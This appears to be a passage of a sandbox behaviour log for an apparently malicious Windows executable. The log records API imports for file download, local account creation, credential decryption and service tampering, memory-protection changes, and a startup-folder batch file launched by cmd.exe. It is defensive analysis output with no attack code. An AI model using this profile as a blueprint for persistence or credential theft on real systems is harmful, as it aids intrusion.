(lpLibFileName="ADVAPI32.dll") returned 0x74810000 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyW") returned 0x748304f0 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExW") returned 0x7482fa20 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExA") returned 0x74830a20 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteValueW") returned 0x74830fb0 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="LookupPrivilegeValueW") returned 0x7482e430 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="AdjustTokenPrivileges") returned 0x74830980 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="AllocateAndInitializeSid") returned 0x7482f660 [0163.794] GetProcAddress (hModule=0x74810000, lpProcName="OpenProcessToken") returned 0x7482f520 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="InitializeSecurityDescriptor") returned 0x7482fc00 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyA") returned 0x748304a0 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="SetSecurityDescriptorDacl") returned 0x7482f830 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExW") returned 0x7482f350 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExA") returned 0x7482f790 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegEnumKeyExW") returned 0x7482f470 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExA") returned 0x7482f500 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryInfoKeyW") returned 0x7482f640 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="RegCloseKey") returned 0x7482f620 [0163.795] GetProcAddress (hModule=0x74810000, lpProcName="OpenServiceW") returned 0x74830690 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="ChangeServiceConfigW") returned 0x748464b0 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="QueryServiceConfigW") returned 0x748305b0 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="EnumServicesStatusExW") returned 0x74830610 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="StartServiceW") returned 0x74834210 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExW") returned 0x7482f7f0 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExA") returned 0x7482fa60 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="OpenSCManagerW") returned 0x74830ed0 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="CloseServiceHandle") returned 0x74830960 [0163.796] GetProcAddress (hModule=0x74810000, lpProcName="GetTokenInformation") returned 0x7482f370 [0163.797] GetProcAddress (hModule=0x74810000, lpProcName="LookupAccountSidW") returned 0x7482f590 [0163.797] GetProcAddress (hModule=0x74810000, lpProcName="FreeSid") returned 0x74830440 [0163.797] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExW") returned 0x7482f330 [0163.797] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75db0000 [0163.797] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteExA") returned 0x76020290 [0163.797] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteExW") returned 0x75f4e690 [0163.797] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetSpecialFolderPathW") returned 0x75f5f9c0 [0163.798] GetProcAddress (hModule=0x75db0000, lpProcName="SHCreateDirectoryExW") returned 0x75f60490 [0163.798] GetProcAddress (hModule=0x75db0000, lpProcName="ShellExecuteW") returned 0x75f4d9f0 [0163.798] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFolderPathW") returned 0x75f54e80 [0163.798] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetKnownFolderPath") returned 0x75f59710 [0163.798] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x717f0000 [0163.851] GetProcAddress (hModule=0x717f0000, lpProcName="URLDownloadToFileW") returned 0x7186b240 [0163.851] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75b90000 [0163.854] GetProcAddress (hModule=0x75b90000, lpProcName="InetNtopW") returned 0x75bbbd80 [0163.855] GetProcAddress (hModule=0x75b90000, lpProcName="getaddrinfo") returned 0x75ba55c0 [0163.855] GetProcAddress (hModule=0x75b90000, lpProcName="freeaddrinfo") returned 0x75ba5ee0 [0163.855] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x753d0000 [0163.855] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitializeSecurity") returned 0x75cb3870 [0163.855] GetProcAddress (hModule=0x753d0000, lpProcName="CoCreateInstance") returned 0x75c70060 [0163.855] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitialize") returned 0x75401930 [0163.855] GetProcAddress (hModule=0x753d0000, lpProcName="CoUninitialize") returned 0x75c492a0 [0163.856] GetProcAddress (hModule=0x753d0000, lpProcName="CoTaskMemFree") returned 0x75c49170 [0163.856] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77680000 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="StrStrW") returned 0x77698540 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="PathRemoveFileSpecA") returned 0x776a2d80 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="StrStrA") returned 0x776a3570 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="PathCombineA") returned 0x776a28e0 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="PathFindFileNameW") returned 0x77697a50 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="PathFileExistsW") returned 0x77698670 [0163.856] GetProcAddress (hModule=0x77680000, lpProcName="PathFindExtensionW") returned 0x77697960 [0163.856] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74d00000 [0163.859] GetProcAddress (hModule=0x74d00000, lpProcName="NetLocalGroupAddMembers") returned 0x6f7e82b0 [0163.864] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserAdd") returned 0x6f7eba50 [0163.864] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0163.864] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75830000 [0163.870] GetProcAddress (hModule=0x75830000, lpProcName="CryptUnprotectData") returned 0x75853140 [0163.871] GetProcAddress (hModule=0x75830000, lpProcName="CryptStringToBinaryA") returned 0x7584d6d0 [0163.871] GetProcAddress (hModule=0x75830000, lpProcName="CryptStringToBinaryW") returned 0x7584d5a0 [0163.871] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74800000 [0163.874] GetProcAddress (hModule=0x74800000, lpProcName="GetModuleFileNameExW") returned 0x748013e0 [0163.874] VirtualProtect (in: lpAddress=0x2b61000, dwSize=0x13000, flNewProtect=0x20, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.874] VirtualProtect (in: lpAddress=0x2b74000, dwSize=0x4a00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.875] VirtualProtect (in: lpAddress=0x2b79000, dwSize=0x600, flNewProtect=0x4, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.875] VirtualProtect (in: lpAddress=0x2caf000, dwSize=0x2e00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.875] VirtualProtect (in: lpAddress=0x2cb2000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.875] VirtualProtect (in: lpAddress=0x2cb3000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0163.875] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0163.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2b65ce2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c0 [0163.876] Sleep (dwMilliseconds=0x320) [0164.742] Sleep (dwMilliseconds=0x320) [0165.616] Sleep (dwMilliseconds=0x320) Thread: id = 9 os_tid = 0xba4 Thread: id = 15 os_tid = 0x634 [0163.917] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0163.917] GetStartupInfoA (in: lpStartupInfo=0xa0ff3c | out: lpStartupInfo=0xa0ff3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0163.917] GetProcessHeap () returned 0x810000 [0163.917] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x80) returned 0x828830 [0163.917] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c4 [0163.918] GetProcessHeap () returned 0x810000 [0163.918] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x38) returned 0x8251e8 [0163.918] GetProcessHeap () returned 0x810000 [0163.918] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x14) returned 0x82b648 [0163.918] GetProcessHeap () returned 0x810000 [0163.918] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x28) returned 0x82c260 [0163.918] GetProcessHeap () returned 0x810000 [0163.918] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x50) returned 0x8288b8 [0163.918] GetProcessHeap () returned 0x810000 [0163.918] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0xa0) returned 0x820dc8 [0163.918] CoInitialize (pvReserved=0x0) returned 0x0 [0163.919] CoCreateInstance (in: rclsid=0x2b745e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2b773f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0xa0fef8 | out: ppv=0xa0fef8*=0xa304a0) returned 0x0 [0164.006] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xa304a0, clsidDeviceClass=0x2b745d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0xa0fefc, dwFlags=0x0 | out: ppenumMoniker=0xa0fefc*=0x0) returned 0x1 [0164.201] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa10000 [0164.201] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa20000 [0164.201] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0164.202] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0164.202] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0164.202] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2d00000 [0164.202] GetProcessHeap () returned 0x810000 [0164.202] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x831688 [0164.203] GetProcessHeap () returned 0x810000 [0164.203] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x831598 [0164.203] GetProcessHeap () returned 0x810000 [0164.203] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x831250 [0164.203] GetProcessHeap () returned 0x810000 [0164.203] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x8312c8 [0164.203] GetProcessHeap () returned 0x810000 [0164.203] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x8314f8 [0164.203] GetProcessHeap () returned 0x810000 [0164.203] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x19) returned 0x831368 [0164.203] Sleep (dwMilliseconds=0x1) [0164.241] GetTickCount () returned 0x152719a [0164.241] Sleep (dwMilliseconds=0x1) [0164.280] GetTickCount () returned 0x15271c8 [0164.280] Sleep (dwMilliseconds=0x1) [0164.309] GetTickCount () returned 0x15271e8 [0164.309] Sleep (dwMilliseconds=0x1) [0164.322] GetTickCount () returned 0x15271f7 [0164.323] Sleep (dwMilliseconds=0x1) [0164.329] GetTickCount () returned 0x15271f7 [0164.329] Sleep (dwMilliseconds=0x1) [0164.390] GetTickCount () returned 0x1527236 [0164.390] Sleep (dwMilliseconds=0x1) [0164.403] GetTickCount () returned 0x1527245 [0164.403] Sleep (dwMilliseconds=0x1) [0164.469] GetTickCount () returned 0x1527284 [0164.469] Sleep (dwMilliseconds=0x1) [0164.509] GetTickCount () returned 0x15272b3 [0164.509] Sleep (dwMilliseconds=0x1) [0164.516] GetTickCount () returned 0x15272b3 [0164.516] Sleep (dwMilliseconds=0x1) [0164.537] GetTickCount () returned 0x15272c2 [0164.541] Sleep (dwMilliseconds=0x1) [0164.554] GetTickCount () returned 0x15272d2 [0164.554] Sleep (dwMilliseconds=0x1) [0164.595] GetTickCount () returned 0x1527301 [0164.595] Sleep (dwMilliseconds=0x1) [0164.636] GetTickCount () returned 0x1527330 [0164.636] Sleep (dwMilliseconds=0x1) [0164.704] GetTickCount () returned 0x152736e [0164.704] Sleep (dwMilliseconds=0x1) [0164.749] GetTickCount () returned 0x152739d [0164.749] Sleep (dwMilliseconds=0x1) [0164.801] GetTickCount () returned 0x15273cc [0164.802] Sleep (dwMilliseconds=0x1) [0164.876] GetTickCount () returned 0x152741a [0164.876] Sleep (dwMilliseconds=0x1) [0164.917] GetTickCount () returned 0x1527449 [0164.917] Sleep (dwMilliseconds=0x1) [0164.960] GetTickCount () returned 0x1527468 [0164.960] Sleep (dwMilliseconds=0x1) [0165.088] GetTickCount () returned 0x15274f5 [0165.088] Sleep (dwMilliseconds=0x1) [0165.146] GetTickCount () returned 0x1527524 [0165.146] Sleep (dwMilliseconds=0x1) [0165.256] GetTickCount () returned 0x1527591 [0165.256] Sleep (dwMilliseconds=0x1) [0165.295] GetTickCount () returned 0x15275c0 [0165.295] Sleep (dwMilliseconds=0x1) [0165.342] GetTickCount () returned 0x15275ef [0165.342] Sleep (dwMilliseconds=0x1) [0165.400] GetTickCount () returned 0x152762d [0165.400] Sleep (dwMilliseconds=0x1) [0165.445] GetTickCount () returned 0x152764d [0165.445] Sleep (dwMilliseconds=0x1) [0165.520] GetTickCount () returned 0x152769b [0165.520] Sleep (dwMilliseconds=0x1) [0165.615] GetTickCount () returned 0x15276f9 [0165.615] Sleep (dwMilliseconds=0x1) [0165.657] GetTickCount () returned 0x1527727 [0165.658] Sleep (dwMilliseconds=0x1) [0165.708] GetTickCount () returned 0x1527756 [0165.708] Sleep (dwMilliseconds=0x1) [0165.732] GetTickCount () returned 0x1527776 [0165.855] Sleep (dwMilliseconds=0x1) [0166.198] GetTickCount () returned 0x152794a [0166.198] Sleep (dwMilliseconds=0x1) [0166.220] GetTickCount () returned 0x152795a [0166.223] Sleep (dwMilliseconds=0x1) [0166.266] GetTickCount () returned 0x1527989 [0166.266] Sleep (dwMilliseconds=0x1) [0166.338] GetTickCount () returned 0x15279d7 [0166.338] Sleep (dwMilliseconds=0x1) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x15a29000" os_pid = "0xd8c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x7d4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\" \"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 913 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 914 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 915 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 916 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 917 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 918 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 919 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 920 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 921 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 922 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 923 start_va = 0x7ff623850000 end_va = 0x7ff6238a9fff monitored = 1 entry_point = 0x7ff6238653f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 924 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1062 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1063 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1064 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1065 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1066 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1068 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1217 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1218 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1219 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1220 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1221 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1222 start_va = 0x7ff857ef0000 end_va = 0x7ff857ef9fff monitored = 0 entry_point = 0x7ff857ef14a0 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\System32\\cmdext.dll" (normalized: "c:\\windows\\system32\\cmdext.dll") Region: id = 1223 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1224 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1225 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1226 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Thread: id = 16 os_tid = 0xd90 [0262.020] GetProcAddress (hModule=0x7ff85cb80000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff859a76e50 [0262.021] GetProcessHeap () returned 0x530000 [0262.021] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4012) returned 0x53b850 [0262.021] GetProcessHeap () returned 0x530000 [0262.021] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x53b850) returned 1 [0262.024] _wcsicmp (_String1="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"", _String2=")") returned -7 [0262.024] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 68 [0262.024] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 68 [0262.024] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 71 [0262.024] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 71 [0262.024] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 80 [0262.024] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"") returned 80 [0262.024] GetProcessHeap () returned 0x530000 [0262.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb0) returned 0x536930 [0262.024] GetProcessHeap () returned 0x530000 [0262.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd6) returned 0x5310e0 [0262.024] GetProcessHeap () returned 0x530000 [0262.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14) returned 0x530810 [0262.025] GetConsoleTitleW (in: lpConsoleTitle=0x14fbb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.028] GetFileAttributesW (lpFileName="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat\"" (normalized: "c:\\windows\\system32\\\"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\programs.bat\"")) returned 0xffffffff [0262.029] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0262.029] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0262.029] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0262.029] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0262.029] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0262.029] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0262.029] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0262.029] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0262.029] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0262.029] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0262.029] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0262.029] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0262.029] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0262.029] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0262.029] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0262.029] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0262.029] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0262.029] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0262.029] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0262.029] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0262.029] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0262.030] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0262.030] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0262.030] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0262.030] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0262.030] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0262.030] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0262.030] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0262.030] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0262.030] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0262.030] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0262.030] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0262.030] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0262.030] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0262.030] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0262.030] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0262.030] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0262.030] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0262.030] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0262.030] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0262.030] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0262.030] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0262.032] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0262.032] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0262.032] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0262.032] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0262.032] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0262.032] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0262.032] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0262.032] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0262.032] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0262.032] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0262.032] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0262.032] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0262.032] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0262.032] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0262.032] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0262.032] _wcsicmp (_String1="\"C", _String2="MD") returned -75 